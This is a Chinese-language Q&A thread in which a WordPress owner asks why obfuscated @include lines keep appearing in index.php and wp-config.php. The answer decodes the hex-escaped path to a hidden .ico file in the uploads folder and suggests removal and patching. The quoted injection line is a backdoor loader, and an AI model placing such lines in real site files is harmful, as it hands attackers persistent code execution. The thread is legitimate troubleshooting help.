恶意软件还是黑客？

Question

我的Wordpress项目的index.php和wpconfig.php文件每隔几天就会自动添加以下行：

/*85896*/

@include "\x2fser\x76ice\x73/we\x62pag\x65s/s\x2fs/s\x73gc.\x63om.\x70k/p\x75bli\x63/we\x62/wp\x2dcon\x74ent\x2fupl\x6fads\x2f.53\x334f5\x306.i\x63o";

/*85896*/

我不知道是什么导致了这一切。我已经多次更改了FTP和帐户访问密码，但这些行每隔一天就会添加到上述文件中。我已经一次又一次地下载了我所有的项目文件，并对它们进行了彻底的扫描，没有检测到病毒或恶意软件。

这可能是什么原因造成的？

Answer 1

include指向：

/services/webpages/s/s/ssgc.com.pk/public/web/wp-content/uploads/.5334f506.ico

从删除文件开始，看看会发生什么。

检查所有插件/主题的安全漏洞/更新。并检查在同一环境中运行的任何其他站点。